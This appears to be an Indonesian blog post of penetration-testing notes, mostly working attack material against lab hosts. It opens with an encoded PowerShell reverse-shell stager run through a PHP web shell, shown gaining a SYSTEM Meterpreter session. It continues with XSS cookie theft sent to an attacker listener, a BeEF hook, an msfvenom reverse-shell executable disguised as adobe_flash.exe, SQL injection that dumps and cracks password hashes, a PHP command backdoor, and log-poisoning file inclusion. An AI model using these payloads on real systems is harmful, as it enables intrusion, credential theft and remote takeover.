AbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
copy mulai dari powershell.exe sampai akhir paste di backdoor
buka di browser :
http://192.168.56.105/wordpress/aa?cmd=powershell.exe%20-nop%20-w%20hidden%20-e%20aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBDADUANQBLADEAOABDAEEANwBWAFcAKwAyACsAYgBTAEIARAArAE8AWgBIAHkAUAA2AEQASwBFAHEAQQA0AHgAcwBSAHUAawAwAGEAcQBkAEkAdgBmAHIAbgBIAHMARQBMAC8AaQBXAHEAYwBOAEwATABEAE8AdwB0AHEAdwArAE4AWAByAC8AMwA2AEQAYgBkAEwAMABtAHYAYgBhAGsAdwA3ADUAcwBZACsAWgAyAFoAbAB2AHYAcABuAEYAVABVAEoAYgBVAEIANQBLADQAcgBvAGoAZgBUADQANwBQAGUAbgBoAEMAQQBlAFMAawBuAFAAKwA3AE8AYQBsAEgASwBtAHAASgB5AGUAdwBtAGcAdQBHADAAZwBkAEoAbQBhAEwARgBvAHMAbwBEAFQATQBQAFoAegBVADAAbABpAFMASQBTAGkAcwBPADgAMABDAEEAQwB4AFQARQBKAEgAaABrAGwAcwBhAEoASwBmADAAawBqAG4AMABUAGsANAB2AFoAeABUAG0AdwBoAGYAWgBaAHkAZgB4AFkAYQBqAEQAOQBpAGQAaABUAGIAVgByAEQAdABFACsAawBDAGgAVQA2ADYAMQArAEUAMgBUAGgAMABwAFcAQQB0AEcAaABTAEoALwArAGkAUwByADAAdwB0ADkAVgBxAGcAdABFADgAeABpAFIAYgBhADIAcwBTAEIAQgB3AFcARgBNAFYAcQBVAHYAYQBuAHIAZwAvAFgAWgBCAEYATgBtAGsAZABzAFIAagA3AG8AcgBDAGkASQBhAGwAeQA4AEkAZwBqAEwARgBMAHUAbQBCAHQAUgBVAHcAaQBmAE8ANwBFAHMAZwBvAHgAdwBDAGMAaQBJAG8AbABDAEMAYQBKAEoAMQBRACsAYgBpAGcAegBEAFgAcwBSAHQANQBEAGcAUgBpAFcATQA1AEwAMAAxAFQAdwA5AFAAWgA3AEEAOQBsAGUAagB6ADEATABnAGsARgBEAFUAaQBoAEYAUQBvAFMAOABZAFYARgBvAGgAVwAxAFMAVgB4AG8ANAB0AEIAaAA1AEkANgA0AE0AOQBDAHkAUgBFAFIARABiADYAYQBxAEkATABiAGkAVAAwAFQASgBoAFEAbABqAGUAZQBsADMAegBDAGgAZABzAHMANAB3ACsAMQBVAGwANQBhAFUAUwBTAFAAVgBFAHAATwBZAGgAaABkADkARgBhAFgASQBuAFkAZQBTAGcASgA3AC8AaQBaAHAAcAAwAEYAWgA1AEQANABnAEcAegBMADIAZQBuAFoANgBkAHUAUgBoAEYAdQBYAHYAdgA2AFMANQBMAEEANgBHAFMANgBIAHgATgB3AFQAZQBuAHgAbQBPADQARgBQADAAagBGAHYARwBUAEMATQBWAGoAdwBhAEEAdgBUADMASAAyAFUARQBIAFgAMgBEAEsAeQBVAFkAMgAvAG4AZQB2ADcASAArAG4AbwBtAEQASwBKAHoASABSAGEAbQBRADAANgBkAEcAUwBnAGMATQA1AG4AYgBrAG4AZQBwADQARQA4AFkAVwBTAFUAdQBEAFUAbAAxAEcAKwBLAEEAMgBoAG4AcABsAE4AYwBBAEoAaQA0AGoAKwB4AEEATABtAFYAZwBYAFgARgBMAGsANAB3AFoAeABxAG8AUQBSAEQANABzAFUAdABEAFQAUAAzADYAbgBWAEEAaQBxAGUAZABZADIARQBNAG8AZABFAHkASQBZAGsAeABlAEEAVgA1AEUALwA5ADEAcABsAEQASABoAFMANQBGAFoAbwBrAEEASQBRAE8AYwB5AEIAZQB6AGcAVwBxAGsAMAB6ADYAUwBPADkAdABkAG4AbwA2AEIAeQBHADUAdwBuAEEAYwA1ADYAVgBlAEEAcgBWAG0ANQB5AFcATABZAEUAYQBjAHYASQBUAEMAbQBCADYAMwBVAEMATAA0AGYAaQBoAC8AZABkAGQATQBtAEsAQQAyAGoAawBWAG0AYgBxAFoAbQBPAEIANwBQAHEALwBBAHcARgBsAEYAaQBRADkASQBnADkAbgB0AHIAUQBXAHkASwBXAFEAcABGAFgAbQBwAFMAaAB4AGgAYgBpADMAcgBaAHUAZgBLAHIAUQBGAFEAdwBZADEAQQBEAFkARwBrAEYAaQBZAEMAVgBGAEEAQgBMAHAARgBTAEkAdwBNAFYAOQAyAHQAVwBDAFIAVQBRAHIAVwBEAEEAUwBnAE0AeQArADYATwBzAE0AZQAxAEQAaQBSADYAYgB2AHUAWQBNADkANABzAGoALwA5AEQARABqADgAbwBHADQASwBSAFkAWgBDAEMALwA4AGcAdwBSAGIAagBJAHUAOABOAEsAUwBSAGcATgA2AFIANABnAHAAawArADAAKwBIAHYAKwBnAFoAZQB6AGMAcQBFAFQAawBtAFEAcwBuAEsAWQAyAHAAcwBSAGMAcgBwADMATwBPAGsAVwA2AHEAbgBsAEQAegBDAHMAZwBjAGgARQBnAEIAQQBQAGUASwBCAGcAVwBQAHkAcgBuAHgAbwBFAGMAbwBiADcAWgBaAFcARQBEAHkAVABWAHMAaABNADIAMwBpAGkATwBsAHAAVAB2AFcAWABDAGQAMABCAEwATABWADYAOQBjAGoANgAyADUAMAAwAHQAcQBtADUAOABGADcAWABpAGwAdABuAHMAVgBmAHYATgBaAG4AbgBWAHQAbwBaAGwAWQBkAFYAYQA0AG0ATwB2AEoAYwB6AGEAZQBEADYAMwBVAFAATgB1AE0AQgBFAFAATABkAFMAOABwADgAVwBuAFMAWABtADMAYQBOAE8AZAAxAFUASABPAFoASwBPADkAMgB4AG0ANwBkAGQASABZADcATwBhAGUANAAwADYAcQByAHUAdABkAHUAZABhAGQALwByAFoATwBPADYATgBLADMAeQBoAGUANABrADYAMQBsAG4AUgBHAHgAdABvAG8AbAB1AE0AYQBYAFQAZgA3AGQATgBCAC8AYQB0AGYARgA0ADIAVABJADgATQBEAFYAdgBMAEgAKwBIAHQATgBOAEoANQBvAFAAZABXADcAdQBXAGcAZwAxAC8ASgBLADkAYQA3AHYARABoAG0AOAA2ADIAMABtAFQAawByAGwAVwA3AE4AQQArADYAaQBQADAAMABiADQAYgBEAEIAcgBlAHcAbQB2AEUAUwBIAHMALwBYAEYAYQBDAE8AVgBwAFcAdgBSAHAARwBMAGQAUQBvAGIAdAB0AHYAbQBkAEUAZgAxAEEAMAAwAHEAQgBsADkAZgBNAHQANwBwAGYATwBxAHAAagA4ADQAeQAxAHIAOQBZAFkAegBiAEEAWABNAGEAVABVADIAZgBqAEoARwBEAEkAdQAzAGUAOAAvAFcAcgBXAHoAOQBNAGMAYwBLAGUAcwBUAFIAUwBHAGQAUgA1ADIATgBZADEAawBPAG0AVgBVAGIATgA4AFMAWABjAFAAeQAzADcARABRAHoAVwBRAEcAUQBZAGMANABUAHAAOQBHAHAAeQBQAHcAVwBiADMASABuAFIARwBBADkAMwBoAFMASQBTAHQAcwBhAFkATgBQAGMAMQBEAHIAdQBWAFAATQBEAEoAQQAyAGwAaQBpAHUAcwBFAHIAMgArAHUAZQAyAGQATwBHAHcAMAB0AGYAZgAzAHoAUwBmAGYAQwBaAGoARgBmAFgAWgBoAHUAZAAxACsAMgBlAHAAbQBuAG4AdwBTAFAAOABhAHMAZwAyAEYANQB0AHcAYgBLAHkAdgBWAG0AdQBCADIAeQBPAHcAZgBhACsAOQBIADMAeAA0AGsANQBJAEUAVwBKAEkATABpAHYATQBYAHEAZgA5AFIAeQB6AFoAeABGAFAAdQBZAEEAUwBXAGcARwAyAGQAMQBXAE8AZABSAC8AZABoAGkAZQA1AHkAbQBHAG8AcQBTADMAcwBaAFAASgBBAG8ASgBnAHcAcwBOAHIAcgB5AE0AeQA0AGcAeABiAHEAZgBOAC8AZABDAEwANABXAFkANQA5AFAAdgAwACsAaABuAEEAcwBIAFQANQA2AGsAaQBWAG4AZwBYAFYAcgAzADAALwBXADcAcQA1AGUAUQBBAHYAbwBVAEQAMgBEAEMANQAwAFMATwBnAEoAUAAxAC8AYwBsAEkAcABGADYATwBQAEYAVABiAGsASQBVAGYANQA2AGEAQgBXACsAMgBDAG8ASABXAC8AbgAwAEkAawBpAHgAZQBUAGIATwA5AHMAYgBWAHQASABCAHkATgB2ADkAZgBJAFQAdgBXAHEAZwA5AC8AegByADkAQwA5AG4AWAB0AEoANwB1AC8AQgBHAE0AeAB2AHcALwA0AHUAOQBWAHYARgAzADQATAAwAGQAKwBOAGYASQBTAHAAQQBFAEUATABXAGcAMABqAGgANwB2AHUAQgB3AEEAYwA2AGYASABpAFgAYwBBAEcAWAB6AGYAdQA4AFUAbABmADQAMgA0AFQAYwBkAEcARgBGADQAUwB6ADAANwA4AEIAZQBJAGYAeQArAHkAdwBLAEEAQQBBAD0AJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
masuk metasploitnya
msf5 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ KEUANGAN-PC 192.168.56.4:6988 -> 192.168.56.105:53925 (192.168.56.105)
msf5 > sessions 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : KEUANGAN-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : id_ID
Domain : MEGACORP
Logged On Users : 3
Meterpreter : x86/windows
meterpreter >
#### XSS
cross site scripting
##### XSS Reflected
1. Memunculkan popup
pada sebuah kolom input, masukkan
<script>alert("XSS")</script>
kalau muncul popup berarti terdapat ada celah xss
2. Redirect :
<script>alert(document.cookie);</script>
3. Mencuri Cookie
pada sebuah kolom input, masukkan
<script>alert(document.cookie);</script>
$ nc -lnvp 8080
masukkan di kolom input
<script>document.location="http://192.168.56.4:8080/steal?cookie=" + document.cookie</script>
di nc akan muncul :
connect to [192.168.56.4] from (UNKNOWN) [192.168.56.4] 53426
GET /steal?cookie=security=low;%20PHPSESSID=ffad61013553290517fa82bb9ae63be1 HTTP/1.1
Host: 192.168.56.4:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.120/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.location%3D%22http%3A%2F%2F192.168.56.4%3A8080%2Fsteal%3Fcookie%3D%22+%2B+document.cookie%3C%2Fscript%3E
Connection: keep-alive
Upgrade-Insecure-Requests: 1
buka incognito
masuk ke web http://192.168.56.4/dvwa/login.php
inspect element, masukkan PHPSESSID=ffad61013553290517fa82bb9ae63be1 dan security=low pada properties
reload halaman
buka : http://192.168.56.120/dvwa/vulnerabilities/xss_r/
##### XSS Stored
1. Memunculkan popup
pada sebuah kolom input, masukkan
<script>alert("XSS")</script>
root@kali:/home/kali# beef-xss
<< masukkan password Anjay123! >>
buka web : 127.0.0.1:3000/ui/login
login dengan user beef password Anjay123!
pada kolom stored xss masukkan
<script src="http://192.168.56.4:3000/hook.js"></script>
muncul online browsers
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.4 LPORT=8081 -f exe -o adobe_flash.exe
$ python -m SimpleHTTPServer 8082
$ nc -lnvp 8081
##### Query SQL Injection
' or 1=1 #
' order by 2#
' union select null, @@version#
' union select table_schema, table_name from information_Schema.tables#
' union select null, concat(table_schema, ";" , table_name, ";'", column_name) FROM information_schema.columns#
' union select user, password from dvwa.users#
' union select null, concat(user, ":" , password)#
copy hasil query terakhir dan masukkan ke file
formatnya:
smithy:5f4dcc3b5aa765d61d8327deb882cf99
nano dvwa-hash
usr/sbin/john --format=RAW-MD5 dvwa-hash
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
password (admin)
password (smithy)
abc123 (gordonb)
letmein (pablo)
Proceeding with incremental:ASCII
charley (1337)
##### Vulnerability upload file
1. Buat file backdoor.php
<?php
system($_GET['cmd']);
?>
2. Tes upload file backdoor.php
3. Open file yg di upload di web ditambahin ?cmd=whoami
http://192.168.56.120/dvwa/hackable/uploads/backdoor.php?cmd=whoami
##### File Inclusion
misal pada link web :
http://192.168.56.120/dvwa/vulnerabilities/fi/?page=include.php
ganti jadi
http://192.168.56.120/dvwa/vulnerabilities/fi/?page=/etc/passwd
kalau berubah coba ekseksi :
http://192.168.56.120/dvwa/vulnerabilities/fi/?page=/var/log/auth.log
lakukan ssh command dengan username backdoor
ssh '<?php system($_GET['cmd']); ?>'@192.168.56.120 dengan password asal
kalau muncul warning : Warning: system() [function.system]: Cannot execute a blank command in
itu bisa
jalankan http://192.168.56.120/dvwa/vulnerabilities/fi/?page=/var/log/auth.log&cmd=more /etc/passwd
kalau commandnya berhasil, kita sudah dapat shell
##### Metode bypass antivirus salah satunya dengan membuat backdoor dengan format powershell
Comments
Post a Comment